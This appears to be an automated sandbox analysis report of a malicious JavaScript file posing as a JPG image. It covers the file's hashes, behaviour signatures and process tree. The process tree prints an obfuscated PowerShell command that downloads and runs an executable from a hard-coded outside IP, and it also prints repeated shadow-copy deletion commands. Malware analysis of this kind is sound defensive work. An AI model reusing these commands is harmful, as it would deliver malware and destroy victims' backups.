Analysis

  • max time kernel
    140s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    08-07-2020 01:06

General

  • Target

    PIC114110.jpg.js

  • Size

    83KB

  • MD5

    821a6c3122354612133a542992bab324

  • SHA1

    efdbbf3dbeed7f53ccf2b73d7afcc6d16c8ca320

  • SHA256

    370dbeca970b02f6c1a07803c736de0fa30a40851f7a21178eb0bdaa16af61ab

  • SHA512

    6474f350bf4790a681677400019d2540d75468d307535a73f296acb3792fb8b19e14140c6b0ad712cd91d493fdeea59048117d07853f2d6c6f189a906a17dc46

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://217.8.117.63/tstjs.exe

Signatures

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Suspicious behavior: EnumeratesProcesses 737 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run entry to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • UAC bypass 3 TTPs 2 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Suspicious use of WriteProcessMemory 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC114110.jpg.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c SGIuanAqBiKFHsR & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://217.8.117.63/tstjs.exe','%temp%LrD47.exe'); & %temp%LrD47.exe & IzCrmFNBwYXdgpf
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://217.8.117.63/tstjs.exe','C:\Users\Admin\AppData\Local\TempLrD47.exe');
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        PID:1896
      • C:\Users\Admin\AppData\Local\TempLrD47.exe
        C:\Users\Admin\AppData\Local\TempLrD47.exe
        3⤵
        • Loads dropped DLL
        • Adds Run entry to start application
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        • Drops file in Windows directory
        PID:1948
        • C:\Windows\88341028628924\taskhostw.exe
          C:\Windows\88341028628924\taskhostw.exe
          4⤵
          • Windows security modification
          • Loads dropped DLL
          • Executes dropped EXE
          • Modifies Windows Defender Real-time Protection settings
          • Windows security bypass
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Users\Admin\AppData\Local\Temp\1156420072.exe
            C:\Users\Admin\AppData\Local\Temp\1156420072.exe
            5⤵
            • Checks whether UAC is enabled
            • Suspicious behavior: EnumeratesProcesses
            • Drops desktop.ini file(s)
            • UAC bypass
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:796
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              wmic.exe SHADOWCOPY /nointeractive
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1840
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin.exe Delete Shadows /All /Quiet
              6⤵
              • Interacts with shadow copies
              PID:1752
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              wmic.exe SHADOWCOPY /nointeractive
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:304
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin.exe Delete Shadows /All /Quiet
              6⤵
              • Interacts with shadow copies
              PID:1896
            • C:\Windows\SysWOW64\Wbem\wmic.exe
              wmic.exe SHADOWCOPY /nointeractive
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1860
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin.exe Delete Shadows /All /Quiet
              6⤵
              • Interacts with shadow copies
              PID:620
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:924
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {2608D367-C53B-47A6-A21C-6DBED1D27B66} S-1-5-21-1131729243-447456001-3632642222-1000:AVGLFESB\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1052
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\1156420072.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\1156420072.exe
      2⤵
      • Executes dropped EXE
      PID:1868

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1752-1-0x0000000002490000-0x0000000002494000-memory.dmp

    Filesize

    16KB